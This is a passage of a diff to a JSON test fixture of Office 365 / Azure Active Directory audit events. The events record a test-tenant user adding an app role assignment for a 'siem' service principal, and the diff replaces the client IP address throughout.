"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -6624,9 +6624,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { @@ -6860,7 +6860,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -6890,9 +6890,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { @@ -7126,7 +7126,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com